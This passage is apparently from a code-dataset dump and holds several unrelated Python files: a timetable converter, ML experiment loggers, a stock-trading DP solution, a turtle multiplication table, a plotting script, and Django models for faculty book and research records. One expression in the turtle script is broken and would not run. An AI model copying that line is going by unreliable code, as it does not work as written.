convert(self):\n\t\tfor row in self.reader:\n\t\t\tif row and row != ['', '', '', '', '', '', '']: # row exists and is populated\n\t\t\t\tweeks = row[-1].split(',') # weeks are in the last column\n\t\t\t\t\n\t\t\t\tfor week in weeks:\n\t\t\t\t\tif '-' in week: # a range of weeks\n\t\t\t\t\t\tindividual_weeks = week.split('-')\n\t\t\t\t\t\tstart_week = int(individual_weeks[0])\n\t\t\t\t\t\tend_week = int(individual_weeks[1])\n\t\t\t\t\t\t\n\t\t\t\t\t\tfor w in range(start_week, end_week + 1):\n\t\t\t\t\t\t\tself.add_entry(row, w)\n\t\t\t\t\telse:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tindividual_week = int(week)\n\t\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\t\tprint(row)\n\t\t\t\t\t\t\traise Exception(\"Something wrong with the week column on this line.\")\n\t\t\t\t\t\tself.add_entry(row, individual_week)\n\t\t\t\t\ndef main():\n\tprint('Soton Timetable - Google Calendar Converter')\n\tprint\n\tprint('Converts the CSV file from the download option on the SUSSED')\n\tprint('Calendar, to a format that can be imported in Google Calendar.')\n\tprint\n\t\n\tdef get_first_term_day():\n\t\t\n\t\tdef get_monday_before(day):\n\t\t\tweekday_val = day.weekday()\n\t\t\treturn day - timedelta(days=weekday_val)\n\t\t\n\t\tfirst_day = \"25/09/2014\"\n\t\tprint(\"Enter the date of the first day of term.\")\n\t\tprint(\"The format should be DD/MM/YYYY.\")\n\t\tprint(\"The default is %s.\" % first_day)\n\t\t\n\t\tday = raw_input(\"> \")\n\t\tif day: # some date has been entered.\n\t\t\tfirst_day = day \n\t\ttry:\n\t\t\tfirst_term_day = datetime.strptime(first_day, \"%d/%m/%Y\")\n\t\t\tif first_term_day.weekday() != 0: # the entered day is not a monday\n\t\t\t\tfirst_term_day = get_monday_before(first_term_day)\n\t\t\t\tprint(\"Setting first day as %s\" % first_term_day.strftime(\"%Y/%m/%d\"))\n\t\texcept ValueError:\n\t\t\traise Exception(\"Invalid first day.\")\n\t\t\treturn get_first_term_day()\n\t\treturn first_term_day\n\t\n\tdef get_input_filename():\n\t\tfilename = ''\n\t\tif len(sys.argv) > 1:\n\t\t\tfilename = sys.argv[1]\n\t\telse:\n\t\t\tprint(\"Enter the location of the input filename.\")\n\t\t\tfilename = raw_input(\"> \")\n\t\treturn filename\n\t\n\tdef get_output_filename():\n\t\tfilename = 'output.csv'\n\t\tif len(sys.argv) > 2:\n\t\t\tfilename = sys.argv[2]\n\t\telse:\n\t\t\tprint(\"Enter output filename.\")\n\t\t\tfilename = raw_input(\"> \")\n\t\treturn filename\n\t\n\tinfile = get_input_filename()\n\tprint\n\toutfile = get_output_filename()\n\tprint\n\tfirst_day = get_first_term_day()\n\tprint\n\t\n\tc = CalendarConverter(infile, outfile, first_day)\n\tc.convert()\n\nmain()\n\t\n\t\n\t","sub_path":"calendar-converter-legacy.py","file_name":"calendar-converter-legacy.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"595957227","text":"import os\r\nimport subprocess\r\nimport re\r\n\r\ndef get_username_from_github():\r\n if \"TRAVIS_PULL_REQUEST_SLUG\" in os.environ:\r\n if os.environ[\"TRAVIS_PULL_REQUEST_SLUG\"] != \"\":\r\n repo_string = os.environ[\"TRAVIS_PULL_REQUEST_SLUG\"]\r\n else:\r\n repo_string = os.environ[\"TRAVIS_REPO_SLUG\"]\r\n\r\n username, _ = repo_string.split(\"/\")\r\n else:\r\n remotes_string = subprocess.check_output(\r\n [\"git\", \"remote\", \"-v\"]\r\n ).decode(\"utf8\")\r\n matches = re.search('origin.*?github.com.(.*?)/softcite-dataset', remotes_string)\r\n username = matches.group(1)\r\n\r\n if (username == \"howisonlab\"):\r\n username = \"jameshowison\"\r\n\r\n return 
username.lower()\r\n","sub_path":"code/getUsername.py","file_name":"getUsername.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"151594829","text":"import json, logging\nfrom kgx.transformers.pandas_transformer import PandasTransformer\nfrom typing import List, Dict\n\nclass JsonTransformer(PandasTransformer):\n \"\"\"\n Transformer that parses a JSON, and loads nodes and edges into a networkx.MultiDiGraph\n \"\"\"\n\n def parse(self, filename: str, input_format: str = 'json', provided_by: str = None, **kwargs) -> None:\n \"\"\"\n Parse a JSON file of the format,\n\n {\n \"nodes\" : [...],\n \"edges\" : [...],\n }\n\n Parameters\n ----------\n filename: str\n JSON file to read from\n input_format: str\n The input file format (``json``, by default)\n provided_by: str\n Define the source providing the input file\n kwargs: dict\n Any additional arguments\n\n \"\"\"\n logging.info(\"Parsing {}\".format(filename))\n if provided_by:\n self.graph_metadata['provided_by'] = [provided_by]\n with open(filename, 'r') as FH:\n obj = json.load(FH)\n self.load(obj)\n\n def load(self, obj: Dict[str, List]) -> None:\n \"\"\"\n Load a JSON object, containing nodes and edges, into a networkx.MultiDiGraph\n\n Parameters\n ----------\n obj: dict\n JSON Object with all nodes and edges\n\n \"\"\"\n if 'nodes' in obj:\n self.load_nodes(obj['nodes'])\n if 'edges' in obj:\n self.load_edges(obj['edges'])\n\n def load_nodes(self, nodes: List[Dict]) -> None:\n \"\"\"\n Load a list of nodes into a networkx.MultiDiGraph\n\n Parameters\n ----------\n nodes: list\n List of nodes\n\n \"\"\"\n logging.info(\"Loading {} nodes into networkx.MultiDiGraph\".format(len(nodes)))\n for node in nodes:\n self.load_node(node)\n\n def load_edges(self, edges: List[Dict]) -> None:\n \"\"\"\n Load a list of edges into a networkx.MultiDiGraph\n\n Parameters\n ----------\n edges: list\n List of edges\n\n \"\"\"\n logging.info(\"Loading {} edges into networkx.MultiDiGraph\".format(len(edges)))\n for edge in edges:\n self.load_edge(edge)\n\n def export(self) -> Dict:\n \"\"\"\n Export networkx.MultiDiGraph as a dictionary.\n\n Returns\n -------\n dict\n A dictionary with a list nodes and a list of edges\n\n \"\"\"\n nodes = []\n edges = []\n for id, data in self.graph.nodes(data=True):\n node = data.copy()\n node['id'] = id\n nodes.append(node)\n for s, o, data in self.graph.edges(data=True):\n edge = data.copy()\n edge['subject'] = s\n edge['object'] = o\n edges.append(edge)\n\n return {\n 'nodes': nodes,\n 'edges': edges\n }\n\n def save(self, filename: str, **kwargs) -> None:\n \"\"\"\n Write networkx.MultiDiGraph to a file as JSON.\n\n Parameters\n ----------\n filename: str\n Filename to write to\n kwargs: dict\n Any additional arguments\n\n \"\"\"\n obj = self.export()\n with open(filename, 'w') as WH:\n WH.write(json.dumps(obj, indent=4, sort_keys=True))\n","sub_path":"kgx/transformers/json_transformer.py","file_name":"json_transformer.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"239171689","text":"import logging\nimport os\n\nfrom zygoat.components import Component, FileComponent, SettingsComponent\nfrom zygoat.components.backend import settings\nfrom zygoat.constants import Projects\n\nfrom . 
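# The smallest input JsonTransformer.load() above accepts is a dict with
# "nodes" and "edges" lists; property names beyond id/subject/object are
# illustrative guesses, not taken from the kgx docs.
graph_obj = {
    "nodes": [{"id": "A", "name": "gene A"}, {"id": "B", "name": "disease B"}],
    "edges": [{"subject": "A", "object": "B", "edge_label": "related_to"}],
}
# load(graph_obj) adds two nodes and one edge to the MultiDiGraph; export()
# walks the graph back into the same {"nodes": [...], "edges": [...]} shape.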
import resources\n\nlog = logging.getLogger()\n\n\"\"\"\n This file contains a few components for setting up basic email capabilities:\n - Takes care of settings for sending email through AWS SES\n - Creates a Mailer class that Zygoat applications can subclass\n - Adds some basic email templates\n\"\"\"\n\nemail_settings = [\n \"\"\"EMAIL_BACKEND = \"django.core.mail.backends.{}.EmailBackend\".format(\n \"console\" if DEBUG else \"smtp\"\n)\"\"\",\n 'EMAIL_HOST = \"email-smtp.us-east-1.amazonaws.com\"',\n \"EMAIL_PORT = 587\",\n 'EMAIL_HOST_USER = prod_required_env(\"DJANGO_EMAIL_HOST_USER\", \"\")',\n 'EMAIL_HOST_PASSWORD = prod_required_env(\"DJANGO_EMAIL_HOST_PASSWORD\", \"\")',\n \"EMAIL_USE_TLS = True\",\n]\n\nsupport_settings = [\n 'SUPPORT_PHONE_NUMBER = \"+1 (855) 943-4177\"',\n 'SUPPORT_EMAIL_ADDRESS = \"support@legalplans.com\"',\n]\n\n\nclass EmailSettings(SettingsComponent):\n def create(self):\n red = self.parse()\n red.extend([\"\\n\"] + email_settings)\n red.extend([\"\\n\"] + support_settings)\n\n log.info(\"Dumping Django email and support settings\")\n self.dump(red)\n\n @property\n def installed(self):\n red = self.parse()\n return red.find(\"name\", value=\"EMAIL_BACKEND\") is not None\n\n\nclass EmailClass(FileComponent):\n resource_pkg = resources\n base_path = os.path.join(Projects.BACKEND, \"shared\")\n filename = \"mailer.py\"\n\n\nclass EmailTemplate(FileComponent):\n resource_pkg = resources\n base_path = os.path.join(Projects.BACKEND, \"backend\", \"templates\", \"email\")\n\n\nclass HtmlTemplate(EmailTemplate):\n filename = \"mlp_transactional_email.html\"\n\n\nclass TextTemplate(EmailTemplate):\n filename = \"mlp_transactional_email.txt\"\n\n\nclass Email(Component):\n pass\n\n\nemail = Email(\n sub_components=[EmailSettings(), EmailClass(), HtmlTemplate(), TextTemplate()],\n peer_dependencies=[settings],\n)\n","sub_path":"willing_zg/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"265009046","text":"import time, os, shutil\nfrom hpbandster.core.result import json_result_logger\n\nclass bohb_logger(json_result_logger):\n def __init__(self, constant_hyperparameter, directory, overwrite=False):\n super(bohb_logger, self).__init__(directory, overwrite)\n self.constants = constant_hyperparameter\n\n \n def new_config(self, config_id, config, config_info):\n import json\n if not config_id in self.config_ids:\n self.config_ids.add(config_id)\n\n full_config = dict()\n full_config.update(self.constants)\n full_config.update(config)\n\n with open(self.config_fn, 'a') as fh:\n fh.write(json.dumps([config_id, full_config, config_info]))\n fh.write('\\n')\n\n\nclass tensorboard_logger(object):\n def __init__(self, pipeline_config, constant_hyperparameter, global_results_dir):\n self.start_time = time.time()\n\n b = pipeline_config['max_budget']\n budgets = []\n while b >= pipeline_config['min_budget']:\n budgets.append(int(b))\n b /= pipeline_config['eta']\n\n self.incumbent_results = {b: 0 for b in budgets}\n self.mean_results = {b: [0, 0] for b in budgets}\n\n self.constants = constant_hyperparameter\n self.results_logged = 0\n self.seed = pipeline_config['random_seed']\n self.max_budget = pipeline_config['max_budget']\n self.global_results_dir = global_results_dir\n\n self.keep_only_incumbent_checkpoints = pipeline_config['keep_only_incumbent_checkpoints']\n\n self.incumbent_configs_dir = os.path.join(pipeline_config['result_logger_dir'], 
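# A quick check of the conditional EMAIL_BACKEND string injected above: the
# format() call flips between the console and smtp backends on DEBUG.
DEBUG = True
backend = "django.core.mail.backends.{}.EmailBackend".format(
    "console" if DEBUG else "smtp")
assert backend == "django.core.mail.backends.console.EmailBackend"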
'incumbents')\n self.status_dir = pipeline_config['result_logger_dir']\n self.run_name = '-'.join(pipeline_config['run_id'].split('-')[1:])\n os.makedirs(self.incumbent_configs_dir, exist_ok=True)\n\n\n def new_config(self, config_id, config, config_info):\n pass\n\n def __call__(self, job):\n import json\n import tensorboard_logger as tl \n\n id = job.id\n budget = int(job.kwargs['budget'])\n config = job.kwargs['config']\n # timestamps = job.timestamps\n result = job.result\n # exception = job.exception\n\n if result is None:\n return\n\n self.results_logged += 1\n\n tl.log_value('BOHB/all_results', result['loss'] * -1, self.results_logged)\n\n if budget not in self.incumbent_results or result['loss'] < self.incumbent_results[budget]:\n self.incumbent_results[budget] = result['loss']\n \n full_config = dict()\n full_config.update(self.constants)\n full_config.update(config)\n\n refit_config = dict()\n refit_config['budget'] = budget\n refit_config['seed'] = self.seed\n \n refit_config['incumbent_config_path'] = os.path.join(self.incumbent_configs_dir, 'config_' + str(budget) + '.json')\n with open(refit_config['incumbent_config_path'], 'w+') as f:\n f.write(json.dumps(full_config, indent=4, sort_keys=True))\n \n with open(os.path.join(self.incumbent_configs_dir, 'result_' + str(budget) + '.json'), 'w+') as f:\n f.write(json.dumps([job.id, job.kwargs['budget'], job.timestamps, job.result, job.exception], indent=4, sort_keys=True))\n\n checkpoints, refit_config['dataset_order'] = get_checkpoints(result['info']) or ([],None)\n refit_config['incumbent_checkpoint_paths'] = []\n for i, checkpoint in enumerate(checkpoints):\n dest = os.path.join(self.incumbent_configs_dir, 'checkpoint_' + str(budget) + '_' + str(i) + '.pt' if len(checkpoints) > 1 else 'checkpoint_' + str(budget) + '.pt')\n if os.path.exists(dest):\n os.remove(dest)\n if self.keep_only_incumbent_checkpoints:\n shutil.move(checkpoint, dest)\n else:\n shutil.copy(checkpoint, dest)\n refit_config['incumbent_checkpoint_paths'].append(dest)\n\n refit_path = os.path.join(self.incumbent_configs_dir, 'refit_config_' + str(budget) + '.json')\n with open(refit_path, 'w+') as f:\n f.write(json.dumps(refit_config, indent=4, sort_keys=True))\n\n if budget >= self.max_budget and self.global_results_dir is not None:\n import autoPyTorch.utils.thread_read_write as thread_read_write\n import datetime\n\n dataset_names = sorted([os.path.splitext(os.path.split(info['dataset_path'])[1])[0] for info in result['info']])\n suffix = ''\n if len(result['info']) > 1:\n suffix += '+[' + ', '.join(dataset_names) + ']'\n if budget > self.max_budget:\n suffix += '+Refit'\n\n for info in result['info']:\n thread_read_write.update_results(self.global_results_dir, {\n 'name': os.path.splitext(os.path.split(info['dataset_path'])[1])[0] + suffix, \n 'result': round(info['val_top1'], 2), \n 'seed': self.seed,\n 'refit_config': refit_path, \n 'text': \"{0}/{1} -- {2}\".format(\n round(info['val_datapoints'] * (info['val_top1'] / 100)),\n info['val_datapoints'],\n round(budget / len(result['info'])))\n })\n\n if self.keep_only_incumbent_checkpoints and get_checkpoints(result['info']):\n for checkpoint in get_checkpoints(result['info'])[0]:\n if os.path.exists(checkpoint):\n os.remove(checkpoint)\n\n if budget not in self.mean_results:\n self.mean_results[budget] = [result['loss'], 1]\n else:\n self.mean_results[budget][0] += result['loss']\n self.mean_results[budget][1] += 1\n\n for b, loss in self.incumbent_results.items():\n tl.log_value('BOHB/incumbent_results_' 
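# How the min_budget/max_budget/eta loop in tensorboard_logger.__init__
# unrolls into the budget ladder it tracks (the values here are assumptions):
def budget_ladder(min_budget, max_budget, eta):
    b, budgets = float(max_budget), []
    while b >= min_budget:
        budgets.append(int(b))
        b /= eta
    return budgets

assert budget_ladder(9, 243, 3) == [243, 81, 27, 9]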
+ str(b), loss * -1, self.mean_results[b][1])\n\n for b, (loss, n) in self.mean_results.items():\n tl.log_value('BOHB/mean_results_' + str(b), loss * -1 / n if n > 0 else 0, n)\n\n status = dict()\n for b, loss in self.incumbent_results.items():\n budget_status = dict()\n budget_status['incumbent'] = loss * -1\n mean_res = self.mean_results[b]\n budget_status['mean'] = mean_res[0] / mean_res[1] * -1 if mean_res[1] > 0 else 0\n budget_status['configs'] = mean_res[1]\n status['budget: ' + str(b)] = budget_status\n\n import datetime\n status[\"runtime\"] = str(datetime.timedelta(seconds=time.time() - self.start_time))\n\n with open(os.path.join(self.status_dir, 'bohb_status.json'), 'w+') as f:\n f.write(json.dumps(status, indent=4, sort_keys=True))\n\n\ndef get_checkpoints(info):\n if not isinstance(info, list):\n if 'checkpoint' in info:\n return [info['checkpoint']]\n return []\n\n checkpoints = []\n dataset_order = []\n for subinfo in info:\n if 'checkpoint' in subinfo:\n checkpoints.append(subinfo['checkpoint'])\n dataset_order.append(subinfo['dataset_id'])\n return checkpoints, dataset_order\n\nclass combined_logger(object):\n def __init__(self, *loggers):\n self.loggers = loggers\n\n def new_config(self, config_id, config, config_info):\n for logger in self.loggers:\n logger.new_config(config_id, config, config_info)\n\n def __call__(self, job):\n for logger in self.loggers:\n logger(job)\n \ndef get_incumbents(directory):\n \n incumbents = os.path.join(directory, 'incumbents')\n\n if not os.path.exists(incumbents):\n return None\n\n import re\n file_re = [\n re.compile('config_([0-9]+).json'),\n re.compile('refit_config_([0-9]+).json'),\n re.compile('result_([0-9]+).json'),\n re.compile('checkpoint_([0-9]+).*.pt'),\n ]\n\n incumbent_files = [[] for _ in range(len(file_re))]\n for filename in sorted(os.listdir(incumbents)):\n for i, reg in enumerate(file_re):\n match = reg.match(filename)\n \n if match:\n budget = int(match.group(1))\n inc_file = os.path.join(incumbents, filename)\n incumbent_files[i].append([budget, inc_file])\n\n return incumbent_files\n\n\ndef get_refit_config(directory):\n _, refit_configs, _, _ = get_incumbents(directory)\n refit_config = max(refit_configs, key=lambda x: x[0]) #get config of max budget\n return refit_config[1]\n","sub_path":"autoPyTorch/utils/loggers.py","file_name":"loggers.py","file_ext":"py","file_size_in_byte":8723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"302699406","text":"\n\n# Your are given an array of integers prices, for which the i-th element is the price of a given stock on day i; and a non-negative integer fee representing a transaction fee.\n# You may complete as many transactions as you like, but you need to pay the transaction fee for each transaction. \n# You may not buy more than 1 share of a stock at a time (ie. 
you must sell the stock share before you buy again.)\n\n# Return the maximum profit you can make.\n\n# 可多次交易,但每次有交易费,只付一次,买卖的时候都可以?\n\n# DP\n\nclass Solution:\n \"\"\"\n @param prices: a list of integers\n @param fee: a integer\n @return: return a integer\n \"\"\"\n def maxProfit(self, prices, fee):\n # write your code here\n # DP, time O(n), space O(n)\n if not prices:\n return 0\n \n n = len(prices)\n sell = [0] * n # max profit if sell at i-th day\n buy = [0] * n # max profit if buy at i-th day\n sell[0] = 0\n buy[0] = -prices[0]\n for i in range(1, n):\n sell[i] = max(sell[i - 1], buy[i - 1] + prices[i] - fee) # pay when selling\n buy[i] = max(buy[i - 1], sell[i - 1] - prices[i])\n \n return sell[n - 1]\n\n\n\nclass Solution:\n \"\"\"\n @param prices: a list of integers\n @param fee: a integer\n @return: return a integer\n \"\"\"\n def maxProfit(self, prices, fee):\n # write your code here\n # DP, time O(n), space O(1)\n if not prices:\n return 0\n \n n = len(prices)\n sell = 0 # max profit we could have if we did not have a share of stock\n buy = -prices[0] - fee # max profit we could have if we owned a share of stock.\n for i in range(1, n):\n sell = max(sell, buy + prices[i])\n buy = max(buy, sell - prices[i] - fee) # pay when buying\n \n return sell","sub_path":"Best Time to Buy and Sell Stock with Transaction Fee.py","file_name":"Best Time to Buy and Sell Stock with Transaction Fee.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"647337138","text":"import turtle\n\nTx, Ty = -100, 200 #标题坐标\nX, Y = -300,180 #乘法表起始坐标\nL, W = 80, 40 #表格的长和宽\nPx, Py = 10, 7 # 公式相对于表格的偏移量\nPsize = 15 #公式字体大小\nLINEsize = 3 # 线宽\nPcolor = \"red\" #公式颜色\nLcolor = \"blue\" #表格颜色\nturtle.speed(20)\n# turtle.screensize(800,600)\nturtle.penup()\nturtle.goto(Tx,Ty)\nturtle.pendown()\n\nturtle.color(\"green\")\nturtle.write(\"9x9乘法表\", font=(\"楷体\", 45, \"normal\"))\n\n\nturtle.penup()\nturtle.goto(X,Y)\nturtle.pendown()\n\nfor y in range(1,10):\n turtle.penup()\n turtle.goto(X, Y-y*W)\n turtle.pendown()\n for x in range(1,y+1):\n turtle.pensize(LINEsize)\n turtle.penup()\n turtle.goto(X+(x-1)*L, Y-y*W)\n turtle.pendown()\n turtle.color(Lcolor)\n turtle.setheading(0)\n turtle.forward(L)\n turtle.left(90)\n turtle.forward(W)\n turtle.left(90)\n turtle.forward(L)\n turtle.left(90)\n turtle.forward(W)\n\n turtle.penup()\n turtle.goto(X+(x-1)*L+Px, Y - y * W+Py)\n turtle.pendown()\n turtle.color(Pcolor)\n turtle.write(str(x if x y else y)+\"=\"+\n format(x*y,\">2d\"),\n font=(\"楷体\",Psize,\"normal\"))\n\n\nturtle.hideturtle()\nturtle.done()\n","sub_path":"python1702/5作业/5.50.py","file_name":"5.50.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"222514546","text":"import matplotlib.pyplot as plt\nimport yaml\n\nf = plt.figure()\n\n#Read Config\nwith open('vars.yaml', 'r') as fi:\n vars = yaml.load(fi)\n\n#Read data into app\n\nfor line in vars['lines']:\n xLines = [vars['graph']['x'][0]]\n yLines = [vars['graph']['y'][0]]\n\n yholder = vars['graph']['y'][0]\n xholder = 0\n for point in line['data']:\n xLines.append(point[1])\n xLines.append(point[1])\n yLines.append(yholder)\n yLines.append(point[0])\n yholder = point[0]\n xholder = point[1]\n xLines.append(vars['graph']['x'][1])\n yLines.append(yholder)\n plt.plot(xLines, yLines)\n\n\n#Make the graph\nplt.axis([vars['graph']['x'][0], vars['graph']['x'][1], 
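# A worked check of the O(1)-space recurrence in the second Solution above,
# on assumed inputs (this variant pays the fee at buy time):
prices, fee = [1, 3, 2, 8, 4, 9], 2
sell, buy = 0, -prices[0] - fee
for p in prices[1:]:
    sell = max(sell, buy + p)              # close the position today
    buy = max(buy, sell - p - fee)         # open a position today, fee up front
assert sell == 8                           # buy@1 sell@8, buy@4 sell@9, two fees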
vars['graph']['y'][0], vars['graph']['y'][1]])\nplt.xlabel(vars['graph']['xLabel'])\nplt.ylabel(vars['graph']['yLabel'])\nplt.title(vars['graph']['title'])\n# plt.annotate('No Trip Zone', xy=(vars['graph']['noTripXY'][1], vars['graph']['noTripXY'][0]), xytext=(3, 1.5))\nplt.grid(True)\nplt.show()\n\n#Make the outfile\n#out = input('Name and extension of file: (ex: file.pdf)')\n#f.savefig(out, bbox_inches='tight')","sub_path":"noTripScript.py","file_name":"noTripScript.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"576022113","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom datetime import datetime\nfrom datetime import date\nfrom functools import partial\n\nimport os\nfrom django.template.defaultfilters import slugify\n\nfrom django import forms\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\n\nfrom web.models import Faculty\nfrom web.get_username import current_request\nfrom django.core.validators import RegexValidator\nfrom .utils.widgets import MonthYearWidget\n\nNATION = (\n ('International', 'International'),\n ('National', 'National'),\n)\n\nPAPER_TYPE = (\n ('Conference', 'Conference'),\n ('Journal', 'Journal'),\n)\n\nTYPEBOOK = (\n ('Book', 'Book'),\n ('Book Chapter', 'Book Chapter'),\n)\n\nTYPEFDP = (\n ('FDP', 'FDP'),\n ('Workshop', 'Workshop'),\n ('Seminar', 'Seminar'),\n)\n\nSPONSOR = (\n ('Free', 'Free'),\n ('Self', 'Self'),\n ('Other', 'Other'),\n)\n\nPRESENTED = (\n ('Presented', 'Presented'),\n ('Published', 'Published'),\n ('Presented & Published', 'Presented & Published'),\n)\n\nINDEXING_TYPE = (\n ('SCI/SCIE', 'SCI/SCIE'),\n ('Scopus', 'Scopus'),\n ('UGC Listed', 'UGC Listed'),\n ('Google Scholars', 'Google Scholars'),\n ('Others', 'Others'),\n ('Not Applicable', 'Not Applicable'),\n)\n\ndef wrapper(instance, filename, field, folder):\n extension = filename.split('.')[-1]\n slug = os.path.join(folder, slugify(getattr(instance, field)))\n return '%s.%s' % (slug, extension)\n\ndef image_name(field='title', folder='general'):\n return partial(wrapper, field=field, folder=folder)\n\nclass BookRecord(models.Model):\n top = models.CharField(verbose_name=\"Type\", max_length=15, blank=False, choices=TYPEBOOK, default=TYPEBOOK[0][0])\n title = models.CharField(verbose_name=\"Title/Topic\", max_length=300, blank=False)\n faculty = models.ForeignKey(Faculty, default=1)\n other = models.CharField(verbose_name=\"Other Authors\", max_length=500, null=True, blank=True)\n# count = models.CharField(verbose_name=\"Total Count\", max_length=3, blank=True, null=True)\n type = models.CharField(verbose_name=\"International/National\", max_length=15, blank=False, choices=NATION, default=NATION[0][0])\n publisher = models.CharField(\n verbose_name=\"Publisher\", max_length=200, blank=False, null=True, validators=[RegexValidator('^[a-zA-Z ,-]*$')])\n address = models.CharField(verbose_name=\"Address\", max_length=200, null=True)\n isbn = models.CharField(verbose_name=\"ISBN\", max_length=50, blank=False, null=True, validators=[RegexValidator('^[0-9-xX]*$')])\n issn = models.CharField(verbose_name=\"ISSN\", max_length=50, blank=True, null=True, validators=[RegexValidator('^[0-9-xX]*$')])\n sponsor = models.CharField(verbose_name=\"Sponsoring Authority\", max_length=15, blank=True, null=True, choices=SPONSOR, default=SPONSOR[0][0])\n amount = models.CharField(verbose_name=\"Amount in INR (If Paid)\", max_length=10, blank=False, 
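# The partial-based upload_to pattern defined above (wrapper/image_name), as a
# standalone sketch without the slugify step; Fake stands in for a model
# instance and exists only for this illustration.
import os
from functools import partial

def wrapper(instance, filename, field, folder):
    extension = filename.split('.')[-1]
    return os.path.join(folder, '%s.%s' % (getattr(instance, field), extension))

upload_to = partial(wrapper, field='title', folder='research')

class Fake:
    title = 'my-paper'

print(upload_to(Fake(), 'scan.pdf'))       # research/my-paper.pdf on POSIX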
validators=[RegexValidator('^[0-9-]*$')], null=True)\n specify = models.CharField(verbose_name=\"If other, specify\", max_length=200, null=True, blank=True)\n pages = models.CharField(verbose_name=\"Total Pages\", max_length=10, blank=False, null=True, validators=[RegexValidator('^[0-9]*$')])\n price = models.CharField(verbose_name=\"Price\", max_length=10, null=True)\n# year = models.CharField(max_length=4, blank=False, validators=[RegexValidator('^[0-9]*$')])\n year = models.DateField(verbose_name=\"Date\", blank=False, null=True)\n created_at = models.DateTimeField(auto_now_add=True, auto_now=False)\n updated_at = models.DateTimeField(auto_now_add=False, auto_now=True)\n\n def clean(self):\n super(BookRecord, self).clean()\n req = current_request()\n try:\n logged_user = req.user.userdepartment\n if ((str(self.faculty.department) == logged_user.department) and (str(self.faculty.shift) == logged_user.shift)) or logged_user.department == 'All':\n return self\n else:\n raise ValidationError(\n \"You don't have rights to change other Department's Data\")\n\n except:\n raise ValidationError(\n \"You don't have rights to change other Department's Data\")\n\n class Meta:\n verbose_name = 'Book Record'\n verbose_name_plural = 'Book Records'\n\n def __unicode__(self):\n return \"%s\" % (self.title)\n\n\nclass ResearchRecord(models.Model):\n title = models.CharField(verbose_name=\"Title/Topic\", max_length=300, blank=False)\n faculty = models.ForeignKey(Faculty, default=1)\n type = models.CharField(verbose_name=\"Conference/Journal\",\n max_length=15, blank=False, choices=PAPER_TYPE, default=PAPER_TYPE[0][0])\n presented = models.CharField(verbose_name=\"Presented/Published\", max_length=25, blank=False, choices=PRESENTED, default=PRESENTED[0][0])\n\n nation = models.CharField(verbose_name=\"International/National\", max_length=15, blank=False, choices=NATION, default=NATION[0][0])\n pdf = models.FileField(upload_to=image_name('title', 'research'), blank=True, null=True)\n other = models.CharField(verbose_name=\"Other Authors\", max_length=500, null=True, blank=True)\n student = models.CharField(verbose_name=\"Paper with students (Y/N - For Conference Only)\", max_length=1, null=True, blank=True, validators=[RegexValidator('^[yYnN]*$')],)\n name_of_conference = models.CharField(verbose_name=\"Name of Conference/Journal\", blank=False, max_length=300, null=True, default=\"\")\n address = models.CharField(max_length=200, null=True, blank=True)\n sponsor = models.CharField(verbose_name=\"Sponsoring Authority\", max_length=15, blank=True, null=True, choices=SPONSOR, default=SPONSOR[0][0])\n amount = models.CharField(verbose_name=\"Amount in INR (If Paid)\", max_length=10, blank=False, validators=[RegexValidator('^[0-9-]*$')], null=True)\n specify = models.CharField(verbose_name=\"If other, specify\", max_length=200, null=True, blank=True)\n indexing = models.CharField(max_length=20, choices=INDEXING_TYPE, blank=False, default=INDEXING_TYPE[0][0])\n specify2 = models.CharField(verbose_name=\"If other, specify\", max_length=200, null=True, blank=True)\n h_index = models.CharField(verbose_name=\"H Index\",\n max_length=10, blank=True, null=True)\n publisher = models.CharField(\n verbose_name=\"Publisher\", max_length=200, blank=True, null=True)\n volume = models.CharField(\n verbose_name=\"Volume\", max_length=100, blank=True, null=True, default=\"\")\n issue = models.CharField(\n verbose_name=\"Issue\", max_length=100, blank=True, null=True, default=\"\")\n isbn = models.CharField(\n 
verbose_name=\"ISBN/ISSN\", max_length=15, blank=True, null=True, validators=[RegexValidator('^[0-9-Xx]*$')])\n pages = models.CharField(verbose_name=\"Page No\",\n max_length=10, blank=True, validators=[RegexValidator('^[0-9-]*$')], null=True)\n\n year = models.DateField(verbose_name=\"Month Year\", blank=True, null=True)\n created_at = models.DateTimeField(auto_now_add=True, auto_now=False)\n updated_at = models.DateTimeField(auto_now_add=False, auto_now=True)\n\n\n\n\n def clean(self):\n super(ResearchRecord, self).clean()\n req = current_request()\n\n type = self.type\n address = self.address\n student = self.student\n presented = self.presented\n publisher = self.publisher\n volume = self.volume\n issue = self.issue\n isbn = self.isbn\n pages = self.pages\n year = self.year\n\n if self.year:\n if (self.year - date.today()).days>0:\n raise ValidationError(\"Date cannot be greater than today's date\")\n\n if type=='Conference':\n if address=='':\n raise ValidationError(\"Address is required for conference\")\n if student=='':\n raise ValidationError(\"Paper with students field is required for conference\")\n\n if presented!='Presented':\n if publisher=='' or volume=='' or issue=='' or isbn=='' or pages=='' or year=='':\n raise ValidationError(\"Records are mandatory if published\")\n\n\n\n try:\n logged_user = req.user.userdepartment\n if ((str(self.faculty.department) == logged_user.department) and (str(self.faculty.shift) == logged_user.shift)) or logged_user.department == 'All':\n return self\n else:\n raise ValidationError(\n \"You don't have rights to change other Department's Data\")\n\n except:\n raise ValidationError(\n \"You don't have rights to change other Department's Data\")\n\n\n\n\n class Meta:\n verbose_name = 'Research Paper & 